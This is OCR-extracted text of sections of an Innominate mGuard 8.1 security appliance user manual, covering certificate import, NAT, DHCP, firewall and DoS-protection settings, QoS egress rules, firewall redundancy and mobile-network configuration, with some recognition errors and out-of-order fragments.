154. ample of imported remote certificates Authentication Certificates Certificate settings Machine Certificates CA Certificates Remote Certificates CRL Trusted remote Certificates gt x Subject CN Battaglia Mauro L KS OU Spezialwartung O Beispiel Lieferant C DE Subject Alternative Names Issuer CN SSH SubCA 01 0 Secure Access GmbH C DE Validity From Mar 20 19 37 46 2007 GMT to Mar 20 19 37 46 2010 GMT Fingerprint MDS 52 E5 2D BE 00 88 0B F8 39 1E BF 92 9F 2E B9 7C SHA1 68 52 FB FF E2 0D 3A 7A 69 D8 B3 D6 CB 7E 82 4E CD DE 9A CE Shoriname Battaglia Mauro Upload Certificate Filename _Durchsuchen__ Import P Downed Cena Authentication gt gt Certificates gt gt Remote Certificates Trusted remote Certificates Importing a new certificate 105661 _en_02 Displays the current imported remote certificates Requirement The file file name extension cer pem or crt is saved on the connected computer Proceed as follows e Click on Browse to select the file e Click on Import Once imported the loaded certificate appears under Certificate e Remember to save the imported certificate along with the other entries by clicking on the Apply button Shortname When importing a remote certificate the CN attribute from the certificate subject field is sug gested as the short name here providing the Shortname field is empty at this point This name can be adopted or another name can b
155. anagement gt gt Web Settings Access menu VPN connections IPsec VPN gt gt Connections menu the certificates imported on the mGuard are provided in a selection list The certificates are displayed under the short name specified for each individual certificate on this page For this reason name assignment is mandatory Creating a certificate copy You can create a copy of the imported machine certificate e g for the partner in order to authenticate the mGuard This copy does not contain the private key and can therefore be made public at any time To do this proceed as follows e Click on Current Certificate File next to the Download Certificate row for the relevant machine certificate e Enter the desired information in the dialog box that opens 198 Innominate Security Technologies 105661_en_02 Authentication menu 7 4 3 CA Certificates CA certificates are certificates issued by a certification authority CA CA certificates are used to check whether the certificates shown by partners are authentic The checking process is as follows the certificate issuer CA is specified as the issuer in the certificate transmitted by the partner These details can be verified by the same issuer using the local CA certificate For a more detailed explanation see Authentication gt gt Cer tificates on page 190 Example of imported CA certificates Authentication Certificates Certifica
156. and intended use of the products in your specific application in particular with regard to ob serving the applicable standards and regulations All information made available in the tech nical data is supplied without any accompanying guarantee whether expressly mentioned implied or tacitly assumed In general the provisions of the current standard Terms and Conditions of Innominate apply exclusively in particular as concerns any warranty liability This user manual including all illustrations contained herein is copyright protected Any changes to the contents or the publication of extracts of this document are prohibited Innominate reserves the right to register its own intellectual property rights for the product identifications of Innominate products that are used here Registration of such intellectual property rights by third parties is prohibited Other product identifications may be afforded legal protection even where they may not be indicated as such Innominate and mGuard are registered trade names of Innominate Security Technolo gies AG mGuard technology is protected by patents 10138865 and 10305413 granted by the German Patent and Trademark Office and by US patents 7 430 759 and 8 146 144 Further patents are pending Published by Innominate Security Technologies AG Rudower Chaussee 13 12489 Berlin Germany Phone 49 0 30 92 10 28 0 contact innominate com www innominate com 27 January
157. any stands for all Ethernet protocols Additional protocols can be specified in name or hexadecimal format for example Pv4 or 0800 ARP or 0806 Action Accept means that the data packets may pass through Drop means that the data packets are not permitted to pass through they are dropped Comment Freely selectable comment for this rule Outgoing The explanation provided under Incoming also applies to Outgoing mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard centerport mGuard industrial rs mGuard blade mGuard delta EAGLE mGuard 105661_en_02 Innominate Security Technologies 215 mGuard 8 1 8 1 6 Advanced The following settings affect the basic behavior of the firewall Network Security Packet Filter Incoming Rules Outgoing Rules DMZ Rule Records MAC Filtering Advanced Consistency checks Maximum size of ping packets ICMP Echo Request Enable TCRUDPRICMP consistency checks Yes w Allow TCP keepalve packets without TCP flags No Network Modes Router PPTP PPPoE ICMP via primary external interface for the mSuard eop ICMP via secondary external interface for the Dro mSuard p ICMP via DMZ interface for the mGuard Drop ka Please note Enabling SNMP access automatically accepts incoming ICMP packets Stealth Mode Allow forwarding of GVRP frames No Allow forwarding of STP frames Mo Allow forwarding of DHCP frames Yes w Connection Tracking
158. are displayed below as follows Network DHCP Internal DHCP External DHCP Mode DHCP mode DHCP Server Options Enable dynamic IP address pool DHCP lease time DHCP range start DHCP range end Local netmask Broadcast address Default gateway DNS server WINS server Static Mapping Current Leases 105661 _en_02 ___ Server w Yes w 14400 192 168 1 100 192 168 1 199 255 255 255 0 192 168 1 255 192 168 1 1 10 0 0 254 192 168 1 2 x Client MAC Address Client IP Address mac i expiration Innominate Security Technologies 163 mGuard 8 1 Network gt gt DHCP gt gt Internal DHCP DHCP Server Options Enable dynamic IP address pool DHCP lease time DHCP range start DHCP range end Local netmask Broadcast address Default gateway DNS server WINS server 164 Innominate Security Technologies Set this option to Yes if you want to use the IP address pool specified under DHCP range start and DHCP range end see below Set this option to No if only static assignments should be made using the MAC addresses see below With enabled dynamic IP address pool When the DHCP server and the dynamic IP address pool have been activated you can specify the network parameters to be used by the computer DHCP range start end The start and end of the address area from which the DHCP server of the mGuard should assign IP addresses to locally connected computers Time in seco
159. are three times as long i e 168 bits in length Still considered to be secure today 3DES is included in the IPsec standard for example AES Advanced Encryption Standard has been developed by NIST National Institute of Standards and Technology over the course of many years of cooperation with industry This symmetrical encryption standard has been developed to replace the earlier DES stan dard AES specifies three different key lengths 128 192 and 256 bits In 1997 NIST started the AES initiative and published its conditions for the algorithm From the many proposed encryption algorithms NIST selected a total of five algorithms for closer examination MARS RC6 Rijndael Serpent and Twofish In October 2000 the Rijndael algorithm was adopted as the encryption algorithm How trustworthy is a certificate and the issuing CA certification authority X 509 cer tificate on page 363 A CA certificate can be consulted in order to check a certificate bear ing this CA s signature This check only makes sense if there is little doubt that the CA cer tificate originates from an authentic source i e is authentic In the event of doubt the CA certificate itself can be checked If as is usually the case the certificate is a sub CA certif icate i e a CA certificate issued by a sub certification authority then the CA certificate of the superordinate CA can be used to check the CA certificate of the subordinate instance If
160. ares the IP addresses stated in the IP packets with the entries in the routing table in order to determine the correct route lf a router is connected to the computer and its internal IP address i e the IP address of the router s LAN port has been relayed to the operating system as the default gateway in the network card s TCP IP configuration then this IP address is used as the destination if all other IP addresses in the routing table are not suitable In this case the IP address of the router specifies the default route because all IP packets whose IP address has no counter part in the routing table i e cannot find a route are directed to this gateway 358 Innominate Security Technologies 105661_en_02 DynDNS provider IP address 105661_en_02 Glossary Also known as Dynamic DNS provider Every computer connected to the Internet has an IP address IP Internet Protocol If the computer accesses the Internet via a dial up modem ISDN or ADSL its Internet service provider will assign it a dynamic IP address In other words the address changes for each online session Even if a computer is online 24 hours a day without interruption e g flat rate the IP address will change during the session If this computer needs to be accessible via the Internet it must have an address that is known to the remote partner This is the only way to establish a connection to the computer However if the address of the computer changes cons
161. ary target is set see Secondary ary targets targets for ICMP echo requests on Page 313 Internal Interface Summarized result See External Interface Ethernet link status See External Interface Number of check See External Interface intervals Check interval See External Interface Timeout per interval See External Interface and set of targets Results of the last 16 See External Interface intervals youngest first 105661_en_02 Innominate Security Technologies 319 mGuard 8 1 13 3 Ring Network Coupling The ring network coupling function is not supported on by mGuard centerport Ring network coupling with restrictions mGuard delta the internal side switch ports cannot be switched off mQGuard pci in driver mode the internal network interface cannot be switched off however this is possible in power over PCl mode 13 3 1 Ring Network Coupling Redundancy Ring Network Coupling Ring Network Coupling Settings Enable Ring Network as ae Coupling Dual Homing Redundancy Port Internal Redundancy gt gt Firewall Redundancy gt gt Ring Network Coupling Settings Enable Ring Network Yes No Coupling Dual Homing When activated the status of the Ethernet connection is trans mitted from one port to another in Stealth mode This means that interruptions in the network can be traced easily Redundancy Port Internal External Internal if the connection is lost established on th
162. ase note The planeholders va VA iw VW in the message will be replaced by s a The configured event in machine readable format A The configured event in human readable format and translated to the configured language Ww The current value of the event in machine readable format W The curent value of the event in human readable format and translated to the configured language Incoming Last incoming text message Current incoming voice call Send text message Recipient number Message Outaoina Network gt gt Mobile Network gt gt Text message Notifications Text message Notifications Any text message recipient can be linked to predefined events and a freely definable mes sage The list is processed from top to bottom Text message recipi Defines a recipient number for the text message ent number Event When the selected event occurs the linked recipient number is selected and the event is sent to them as an text message An text message can also be stored and sent A complete list of all events can be found at Event table on page 53 105661_en_02 Innominate Security Technologies 177 mGuard 8 1 Network gt gt Mobile Network gt gt Text message Notifications Incoming Selector Text message content A configured VPN connection can be selected here which is monitored via text message Here you can enter the text that is sent as an text message 160 characters maximum 7 bit ASCII n
163. attack is the repetition of previously sent encrypted data packets using copies which have been saved by the attacker The data traffic is protected by sequential numbers Indepen dent sequential numbers are used for each direction in an IPsec channel The mGuard drops ESP packets which have the same sequential number as a packet that has already been decrypted for a specific IPsec channel by the mGuard This mechanism is known as the IPsec replay window The IPsec replay window is only replicated sporadically during state synchronization as it is very resource intensive Therefore the active mGuard may have an obsolete IPsec re play window following a fail over An attack is then possible until the real VPN partner has sent the next ESP packet for the corresponding IPsec SA or until the IPsec SA has been renewed To avoid having an insufficient sequential number for the outgoing IPsec SA VPN redun dancy adds a constant value to the sequential number for each outgoing IPsec SA before the mGuard becomes active This value is calculated so that it corresponds to the maximum number of data packets which can be sent through the VPN channel during the maximum fail over switching time In the worst case 1 Gigabit Ethernet and a switching time of 10 sec onds this is 0 5 of an IPsec sequence At best this is only one per thousand Adding a constant value to the sequential number prevents the accidental reuse of a se quence number already used
164. ault Queue Default Rules gt x eT oi Current TOSIDSCP New TOSDSCP 1 All 0 0 0 0 0 0 0 0 0 0 any TOS Minimize Delay w Unchanged v Urgent X 2 Al v 0 0 0 0 0 0 0 0 0 0 any TOS Maximize Reliability ow Unchanged v important v Bi 3 v 0 0 0 0 0 0 0 0 0 0 any TOS Minimize Cost v Unchanged w Low Priority v All of the tab pages listed above for Egress Rules for the Internal External External 2 and Dial in interfaces and for VPN connections routed via these interfaces have the same set ting options In all cases the settings relate to the data that is sent externally into the network from the relevant mGuard interface 302 Innominate Security Technologies 105661_en_02 QoS menu QoS menu gt gt Egress Rules gt gt Internal External External 2 Dial in QoS menu gt gt Egress Rules VPN gt gt VPN via Internal VPN via External VPN via External 2 VPN via Dial in Default Default Queue Rules Protocol From IP From Port To IP To Port 105661_en_02 Name of the egress queue user defined The names of the queues are displayed as listed or specified under Egress Queues on the nternal External VPN via Exter nal tab pages The following default names are defined De fault Urgent Important Low Priority Traffic that is not assigned to a specific egress queue under Rules remains in the default queue You can specify which egress queue should be us
165. ay address on these computers NAT should be activated if the mGuard is operated in Router mode and establishes the connection to the Internet see Network gt gt NAT on page 152 Only then can the computers in the connected local network access the Internet via the mGuard If NAT is not activated it is possible that only VPN connections can be used In Router network mode a secondary external interface can also be configured see Sec ondary External Interface on page 116 There are several Router modes depending on the Internet connection static DHCP PPPoE PPPT Modem Built in Modem Built in mobile network modem 105661_en_02 Innominate Security Technologies 109 mGuard 8 1 Router Mode static The IP address is fixed Router Mode DHCP The IP address is assigned via DHCP Router Mode PPPoE PPPoE mode corresponds to Router mode with DHCP but with one difference the PPPoE protocol which is used by many DSL modems for DSL Internet access is used to connect to the external network Internet WAN The external IP address which the mGuard uses for access from remote partners is specified by the provider If the mGuard is operated in PPPoE mode the mGuard must be set as the default gate way on the locally connected computers This means that the IP address of the mGuard LAN port must be specified as the default gateway address on these computers If the mGuard is opera
166. be accessed via IP address 10 0 0 8 in the external network 192 168 0 8 192 168 0 0 24 10 0 0 0 24 The mGuard claims the IP addresses entered for the External network for the devices in its Local network The mGuard returns ARP answers for all addresses from the specified External network on behalf of the devices in the Local network Therefore the IP ad dresses entered under External network must not be used They must not be assigned to other devices or used in any way as an IP address conflict would otherwise occur in the external network This even applies when no device exists in the Internal network for one or more IP addresses from the specified External network Innominate Security Technologies 153 mGuard 8 1 Network gt gt NAT gt gt Masquerading Default settings 1 1 NAT is not active a 1 1 NAT cannot be applied to the External 2 interface a 1 1 NAT is only used in Router network mode Local network The address of the network on the LAN port External network The address of the network on the WAN port Netmask The subnet mask as a value between 1 and 32 for the local and external network address see also CIDR Classless Inter Domain Routing on page 24 Comment Can be filled with appropriate comments External 2 and Any External are only for devices with a serial interface mGuard rs4000 rs2000 3G mGuard rs4000 rs2000 mGuard centerport m
167. blems can be solved by reducing the MTU to 1496 105661_en_02 Innominate Security Technologies 151 mGuard 8 1 6 3 Network gt gt NAT 6 3 1 Masquerading Masquerading IP and Port Forwarding Network Address Translation IP Masquerading p External v 0 0 0 0 0 These rules let you specify which IP addresses normally addresses within the private address space are to be rewritten to the mGuard s IP address Please note These rules won t apply to the Stealth mode 1 1 NAT 0 0 0 0 0 0 0 0 24 Yes v Network gt gt NAT gt gt Masquerading Masquerading Network Address Translation IP Masquerading Lists the rules established for NAT Network Address Translation For outgoing data packets the device can rewrite the specified sender IP addresses from its internal network to its own external address a technique referred to as NAT Network Address Translation see also NAT Network Address Translation in the glossary This method is used if the internal addresses cannot or should not be routed externally e g because a private address area such as 192 168 x x or the internal network structure should be hidden The method can also be used to hide external network structures from the internal de vices To do so set the Internal option under Outgoing on Interface The Internal set ting allows for communication between two separate IP networks where the IP devices have not configured a useful default ro
168. by the mGuard Only this router should keep the virtual IP Otherwise you can define targets which are accessible via this route in the connectivity check In this case the virtual IP address of the router would not be a sensible target Redundant group Several redundant pairs can be connected within a LAN segment redundant group You define a value as an identifier through the router ID for each virtual instance of the redun dant pair As long as these identifiers are different the redundant pairs do not come into conflict with each other Data traffic In the event of a high latency in a network used for state synchronization updates or a seri ous data loss on this network the mGuard on standby is assigned the outdated state This does not occur however as long as no more than two back to back updates are lost This is because the mGuard on standby automatically requests a repeat of the update The la tency requirements are the same as those detailed under Fail over switching time on page 335 105661_en_02 Innominate Security Technologies 341 mGuard 8 1 Sufficient bandwidth The data traffic generated as a result of the connectivity check availability check and state synchronization uses bandwidth on the network The connectivity check also generates complicated calculations There are several ways to limit this or stop it completely If the influence on other devices is unacceptable The connectivity che
169. by the other mGuard shortly before it failed Another effect is that ESP packets sent from the previously active mGuard are dropped by the VPN partner if new ESP packets are received earlier from the mGuard that is currently active To do this the latency on the network must differ from the fail over switching time 348 Innominate Security Technologies 105661_en_02 105661_en_02 Redundancy An error interrupts the initial establishment of the ISAKMP SA or IPsec SA If an error interrupts the initial establishment of the ISAKMP SA or IPsec SA the mGuard on standby can continue the process seamlessly as the state of the SA is replicated synchro nously The response to an IKE message is only sent from the active mGuard after the mGuard on standby has confirmed receipt of the corresponding VPN state synchronization update When an mGuard becomes active it immediately repeats the last IKE message which should have been sent from the previously active mGuard This compensates for cases where the previously active mGuard has sent the state synchronization but has failed before it could send the corresponding IKE message In this way the establishment of the ISAKMP SA or IPsec SA is only delayed by the switch ing time during a fail over An error interrupts the renewal of an ISAKMP SA If an error interrupts the renewal of an ISAKMP SA this is compensated in the same way as during the initial establishment of the SA The old ISAKMP SA is
170. c connection expec An existing OPC connection may negotiate another connec tations tion on a new port If the Sanity check for OPC classic is ac tivated these connections must only be OPC connections The mGuard opens a port for the new connection by adding a temporary firewall rule After the time set here has elapsed the firewall rule is removed again After that new connections can no longer be established via this port Existing connec tions are retained 105661_en_02 Innominate Security Technologies 221 m Guard 8 1 8 1 7 Firewall for the mGuard rs2000 3G The mGuard rs2000 3G has a simple 2 click firewall This either permits or rejects all incoming and outgoing connections No advanced settings are provided Furthermore access via this firewall is not logged see Logging gt gt Browse local logs The following firewall functionality is available when using the mGuard rs2000 or mGuard rs2000 3G Incoming Rules Accept all incoming connections Drop all incoming connections Accept Ping only This setting allows all ping packets to pass The integrated protection against brute force attacks is not effective in this case Network Security Packet Filter Incoming Rules Outgoing Rules Incoming General firewall setting Accept all incoming connections Accept all incoming connections Drop all incoming connections Accept Ping only Outgoing Rules A
171. cations are required on the computer itself M M M U M Figure 1 1 Stealth mode Plug n Protect 105661_en_02 Innominate Security Technologies 13 mGuard 8 1 1 2 2 Network router When used as a network router the mGuard can provide the Internet link for several com puters and protect the company network with its firewall One of the following network modes can be used on the mGuard Router if the Internet connection is for example via a DSL router or a permanent line PPPoE if the Internet connection is for example via a DSL modem and the PPPoE protocol is used e g in Germany PPTP if the Internet connection is for example via a DSL modem and the PPTP pro tocol is used e g in Austria Modem if the Internet connection is via a serial connected modem compatible with Hayes or AT command set Built in mobile phone modem mobile phone router via integrated mobile phone modem For computers in the Intranet the mGuard must be specified as the default gateway DSL Modem Router Tr g E oe Figure 1 2 Network router 14 Innominate Security Technologies 105661_
172. ccept all outgoing connections Drop all outgoing connections Accept Ping only This setting allows all ping packets to pass The integrated protection against brute force attacks is not effective in this case Hetwork Security Packet Filter Incoming Rules Outgoing Rules Outgoing General firewall setting Accept all outgoing connections Accept all outgoing connections Drop all outgoing connections Accept Ping only These variables are also available on other devices However other devices also have ad vanced settings See Incoming rules on page 206 and Outgoing rules on page 208 222 Innominate Security Technologies 105661_en_02 Network Security menu 8 2 Network Security gt gt DoS Protection 8 2 1 Flood Protection a This menu is not available on the mGuard rs2000 3G Network Security DoS Protection Flood Protection TCP Maximum number of new outgoing TCP connections SYN per second Maximum number of new incoming TCP connections SYN per second ICMP Maximum number of outgoing ping frames ICMP Echo Request per second Maximum number of incoming ping frames ICMP Echo Request per second Stealth Mode Maximum number of outgoing ARP requests or ARP replies per second each Maximum number of incoming ARP requests or ARP replies per second each Network Security gt gt DoS Protection gt gt Flood Protection TCP Maximu
173. ce the con nection to the external network can also or additionally be established via the serial interface using a modem Alternatively the serial interface can also be used as follows For PPP dial in into the local network or for configuration purposes For devices with a built in modem analog modem or ISDN terminal adapter the modem can be used additionally to combine access options The details for this must be configured on the General Ethernet Dial out Dial in and Mo dem Console tab pages For a more detailed explanation of the options for using the serial interface and a built in modem see Modem Console on page 139 Connecting the network interface Connect the EAGLE mGuard to the PC via a standard Ethernet patch cable This ensures a correct connection even when auto MDIX and auto negotiation are switched off The mGuard platforms have DTE interfaces only exception the EAGLE mGuard has a DCE network interface Connect the mGuards to the DTE interface using an Ethernet crossover cable Here the auto MDIX is permanently switched on so it does not matter if the auto negotiation parameter is disabled Innominate Security Technologies 105 mGuard 8 1 6 1 1 General General Dial out Dial in Modem Console Network Status External IP address 10 0 95 29 Active Defaultroute via Used DNS servers DNS Root Servers Internal modem Offline Network Mode Network Mode Router w Router Mode static v Network
174. cepted if SNMP ac cess is activated Drop all ICMP messages to the mGuard are dropped Allow ping requests only ping messages ICMP type 8 to the mGuard are accepted Allow all ICMPs all ICMP message types to the mGuard are accepted Yes No The GARP VLAN Registration Protocol GVRP is used by GVRP capable switches to exchange configuration informa tion If this option is set to Yes GVRP packets are allowed to pass through the mGuard in Stealth mode Innominate Security Technologies 217 mGuard 8 1 Network Security gt gt Packet Filter gt gt Advanced Allow forwarding of STP frames Allow forwarding of DHCP frames Connection Tracking Maximum table size Allow TCP connec tions upon SYN only Timeout for estab lished TCP connec tions seconds 218 Innominate Security Technologies Yes No The Spanning Tree Protocol STP 802 1d is used by bridges and switches to detect and consider loops in the ca bling If this option is set to Yes STP packets are allowed to pass through the mGuard in Stealth mode Yes No When set to Yes the client is allowed to obtain an IP address via DHCP regardless of the firewall rules for outgoing data traffic This option is set to Yes by default This entry specifies an upper limit This is set to a level that can never be reached during normal practical operation However itcan be easily reached in the event of attacks thus providing addit
175. ch remote certificate the mGuard should adopt in order to authenticate the partner SSH client The remote certificate can be selected from the selection list The selection list contains the remote certificates that have been loaded on the mGuard under the Authentication gt gt Cer tificates menu item All users root admin netadmin audit Filter which specifies that the SSH client has to be authorized for a specific administration level in order to gain access When establishing a connection the SSH client shows its cer tificate and also specifies the system user for which the SSH session is to be opened root admin netadmin audit Ac cess is only granted if the entries match those defined here Access for all listed system users is possible when All users is set The netadmin and audit setting options relate to access rights with the mGuard device manager Innominate Security Technologies 51 m Guard 8 1 4 1 4 E Mail Management System Settings Host Time and Date I Shell Access E Mail E Mail Sender address of e mail notifications Address of the e mail server Port number of the e mail server Encryption mode for the e mail Server SMTP Login name SMTP Password E Mail notifications mGuardBerlinCentral test org smip test org TLS Encryption ka test l y F adming test org State of the Power Supply 1 Management gt gt System Settings gt gt E Mail E
176. chnologies 303 mGuard 8 1 QoS menu gt gt Egress Rules gt gt Internal External External 2 Dial in QoS menu gt gt Egress Rules VPN gt gt VPN via Internal VPN via External VPN via External 2 VPN via Dial in Current TOS DSCP Each data packet contains a TOS or DSCFP field TOS stands for Type of Service DSCP stands for Differentiated Services Code Point The traffic type to which the data packet belongs is specified here For example an IP phone will write a differ ent entry in this field for outgoing data packets compared to an FTP program that uploads data packet to a server When you select a value here only the data packets that have this TOS or DSCP value in the corresponding fields are cho sen These values are then set to a different value according to the entry in the New TOS DSCP field New TOS DSCP If you want to change the TOS DSCP values of the data pack ets that are selected using the defined rules enter the text that should be written in the TOS DSCFP field here For a more detailed explanation of the Current TOS DSCP and New TOS DSCP options please refer to the following RFC documents RFC 3260 New Terminology and Clarifications for Diff serv RFC 3168 The Addition of Explicit Congestion Notifica tion ECN to IP RFC 2474 Definition of the Differentiated Services Field DS Field RFC 1349 Type of Service in the Internet Protocol Suite Queue Name Nam
177. ck Connectivity check State synchroni zation The table starts with the most recent state The abbreviations are as follows Firmware started up completely Firmware not yet started up completely Valid system time Invalid system time Timeout No timeout Unknown state Another mGuard is available This mGuard is active or is currently being enabled Another mGuard is available This mGuard is on standby or is currently switching to standby No other mGuard available Unknown state Check of all components was successful Check of at least one component has failed Unknown state Database is up to date Database is obsolete Database switching to on_standby Database switching to active Innominate Security Technologies 317 m Guard 8 1 13 2 2 Connectivity Status Redundancy FW Redundancy Status Redundancy Status Connectivity Status External Interface Summarized result Ethernet link status Number of check intervals Kind of check Check interval Timeout per interval and set of targets Results of the last 16 intervals youngest first Results of the primary targets Internal Interface Summarized result Ethernet link status Number of check intervals Kind of check Check interval Timeout per interval and set of targets Results of the last 16 intervals youngest first success connected N 65536 32456 at least one target must respond 300
178. ck gt gt Global gt gt Access Allowed Networks Lists the firewall rules that have been set up for SEC Stick remote access gt SX ll ee ee o Comment o d Log o 0 0 0 0 0 External w Accept v No v If multiple firewall rules are defined these are queried starting from the top of the list of entries until an appropriate rule is found This rule is then applied If the list of rules con tains further subsequent rules that could also apply these rules are ignored The rules specified here only take effect if Enable SEC Stick remote access is set to Yes Internal access is also possible when this option is set to No A firewall rule that would refuse nternal access does therefore not apply in this case Multiple rules can be specified From IP Enter the address of the computer network from which remote access is permitted or forbidden in this field IP address 0 0 0 0 0 means all addresses To specify an ad dress area use CIDR format see CIDR Classless Inter Do main Routing on page 24 Interface External Internal External 2 VPN Dial in Specifies to which interface the rule should apply If no rules are set or if no rule applies the following default set tings apply Remote SEC Stick access is permitted via Internal VPN and Dial in Access via External and External 2 is refused Specify the access options according to your requirements If you want to refuse access via Internal VPN or Dial
179. ck must either be deactivated or must only relate to the actual IP address of the other mGuard The data traffic generated by the availability check and state synchronization must be moved to a separate VLAN Switches must be used which allow separation of the VLANs Dedicated interface The mGuard centerport supports a dedicated interface This is areserved direct Ethernet interface or a dedicated LAN segment via which the state synchronization is sent This sep arates the load physically from the internal LAN segment 342 Innominate Security Technologies 105661_en_02 Redundancy 16 1 9 Transmission capacity with firewall redundancy These values apply to Router network mode when the data traffic for state synchronization is transmitted without encryption If the transmission capacity described here is exceeded in the event of errors the switching time may be longer than that set Platform Transmission capacity with firewall redun dancy mGuard centerport 1500 Mbps bidirectional not more than 400 000 frames s mGuard industrial rs 150 Mbps bidirectional mGuard smart not more than 12 750 frames s mGuard core l mGuard pci ae MHz mGuard blade mGuard delta EAGLE mGuard mGuard industrial rs 62 Mbps bidirectional mGuard smart not more than 5250 frames s mGuard core l mGuard pci e MHz mGuard blade mGuard delta EAGLE mGuard mGuard rs4000 62 Mbps bidirectional mGuard rs4000 3G not more than 5
180. com Limitation of login attempts In the event of a Denail of Service attack services are intentionally made unable to function To prevent this type of attack the mGuard is provided with a choke for different network re quests This feature is used to count all connections going out from one IP address and using a spe cific protocol When counting a specific number of connections without a valid login the choke becomes effective If no invalid connection attempt is made for the duration of 30 sec onds the choke is reset Each new request without valid login from this IP address resets the timer by 30 seconds The number of connection attempts that need to fail until the choke becomes effective de pends on the protocol 20when using HTTPS 6when using SSH SNMP COM server 2 2 User roles root User role without restrictions admin Administrator netadmin Administrator for the network only audit Auditor tester The predefined users root admin netadmin and audit have different permissions The root user has unrestricted access to the mGuard The admin user also has unrestricted functional access to the mGuard however the number of simultaneous SSH sessions is limited Permissions are explicitly assigned to the netadmin user via the mGuard device manager This user only has read access to the other functions Pass words and private keys cannot be read by this user This audit user only has read acc
181. ction of the mGuard and thus allows for error diag nostics The alarm output reports the following if it has been activated Failure of the redundant supply voltage Monitoring of the link status of the Ethernet connections Monitoring of the temperature condition Monitoring of the connection state of the internal modem 28 Innominate Security Technologies 105661_en_02 105661_en_02 Changes compared to the previous version 3 1 4 OPC Inspector for Deep Packet Inspection for OPC Classic When using the OPC Classic network protocol interconnected firewalls virtually have no ef fect In addition conventional NAT routing cannot be used When activating the OPC Classic function the OPC packets are monitored under Network Security gt gt Packet Filter gt gt Advanced The TCP ports that are negotiated during the connection opened first are detected and opened for OPC packets If no OPC packets are transmitted via these ports within a config urable timeout they are closed again If the OPC validity check is activated only OPC pack ets must be transmitted via OPC Classic port 135 3 1 5 Additional functions Extended DynDNS providers When establishing VPN connections it is useful that the devices obtain their IP address via a DynDNS service In version 8 1 more DynDNS providers are supported New mode for Pre Shared Key authentication method When selecting the Pre Shared Key PSK authentication met
182. cy Status gt gt Connectivity Status Check interval Shows the time in milliseconds between the starts of the checks This value is calculated from the set fail over switching time Timeout per interval Shows the time in milliseconds after which a target is classed and set of targets as no response if no response to the ICMP echo request has been received This value is calculated from the set fail over switching time Waiting time prior to Time the redundancy system ignores an error reporting an error The connectivity and availability checks ignore an error until it except for link errors y y g is still present after the time set here has elapsed This value is set under Waiting time prior to switching in the Redundancy gt gt Firewall Redundancy gt gt Redundancy menu Results of the last16 A green plus indicates a successful check intervals youngest A red minus indicates a failed check first Results of the primary Only visible when a primary target is set See Primary targets targets for ICMP echo requests on Page 313 Shows the results of the ICMP echo requests in chronological order The most recent result is at the front sR indicates a cycle during which ICMP echo requests have been correctly transmitted and received Missing answers are indicated by a f and requests that have not been transmitted are indicated by a _ Results of the second Only visible when a second
183. d here for the administration of the mGuard If The multiple clients option is selected under Stealth configuration The client does not answer ARP requests No client is available Remote access via HTTPS SNMP and SSH is only possible using this address With static Stealth configuration the Stealth Management IP Address can always be accessed even if the network card of the client PC has not been activated If the secondary external interface is activated see Secondary External In terface on page 116 the following applies If the routing settings are such that data traffic to the Stealth Management IP Address would be routed via the secondary external interface this would be an exclusion situation i e the mGuard could no longer be admin istered locally To prevent this the mGuard has a built in mechanism that ensures that in such an event the Stealth Management IP Address can still be accessed by the locally connected computer or network 105661_en_02 Network menu Network gt gt Interfaces gt gt General Stealth network mode Static routes 105661_en_02 Management IP IP addresses IP address via which the mGuard can be accessed and ad ministered The IP address 0 0 0 0 deactivates the management IP ad dress Change the management IP address first before specifying any additional addresses Netmask The subnet mask of the IP address above Use VLAN Yes No IP
184. d out as a reason why the mGuard considers the new configuration to be faulty Download timeout Default 120 seconds Specifies the maximum timeout length period of inactivity when downloading the configuration file The download is aborted if this time is exceeded If and when a new download is attempted depends on the setting of Pull Schedule see above Login Login user name that the HTTPS server requests Password Password that the HTTPS server requests Server Certificate The certificate that the mGuard uses to check the authenticity of the certificate shown by the configuration server It pre vents an incorrect configuration from an unauthorized server from being installed on the mGuard The following may be specified here A self signed certificate of the configuration server or The root certificate of the CA certification authority that issued the server certificate This is valid when the config uration server certificate is signed by a CA instead of self signed Innominate Security Technologies 93 mGuard 8 1 Management gt gt Central Management gt gt Configuration Pull 94 Download Test Innominate Security Technologies If the stored configuration profiles also contain the private VPN key for the VPN connection s with PSK the following conditions must be met The password should consist of at least 30 random upper and lower case letters and numbers to pre
185. d to switch A1 through its external Ethernet interface and to switch A2 through its internal Ethernet interface mGuard B is connected accordingly to switches B1 and B2 In this way the switches and mGuard devices connect an external Ethernet network to an internal Ethernet network The connection is established by forward ing network packets in Router network mode Firewall redundancy compensates for errors displayed in Figure 16 2 if only one occurs at any given time If two errors occur simultaneously they are only compensated if they occur in the same area A or B For example if one of the mGuard devices fails completely due to a power outage then this is detected A connection failure is compensated if the connection fails completely or par tially When the connectivity check is set correctly a faulty connection caused by the loss of data packets or an excessive latency is detected and compensated Without the connectiv ity check the mGuard cannot determine which area caused the error A connection failure between switches on a network side internal external is not compen sated for 7 and 8 in Figure 16 2 Innominate Security Technologies 337 mGuard 8 1 16 1 7 Handling firewall redundancy in extreme situations a The situations described here only occur rarely Restoration in the event of a network lobotomy A network lobotomy occurs if a redundant pair is separated into two mGuard devices oper ating independently
186. d with two SIM cards The SIM card in the SIM 1 slot is the primary SIM card which is normally used to establish the connection If this connection fails the device can turn to the second card in the SIM 2 slot The SIM card in slot 1 takes over the mobile network connection in these cases f the mGuard is restarted When logging into the mobile network provider again Inthe event of an error with the mobile network connection of SIM 2 lf there is a timeout which is set under Maximum runtime of the fallback SIM until switching back to the primary SIM The SIM card in slot 2 takes over the mobile network connection if the connection via SIM 1 fails The SIM card in slot 2 maintains the mobile network connection until one of the afore mentioned cases occurs If SIM 2 is also unable to establish a mobile network connection the intervals for successive logon attempts is increased to 60 seconds Network Mobile Network 174 Innominate Security Technologies State PIN of the SIM card Roaming Access Point Name APN of the Provider PPP authentication Maximum runtime of the fallback SIM until switching back to the primary SIM General SIM Settings Text message Notifications Positioning system Current SIM Slot Using SIM 2 State SIM inserted and authorized Dual SIM state Fallback mode Secondary SIM Roaming Registered to foreign network Current Provider Vodafone de Primary SIM slot Activa
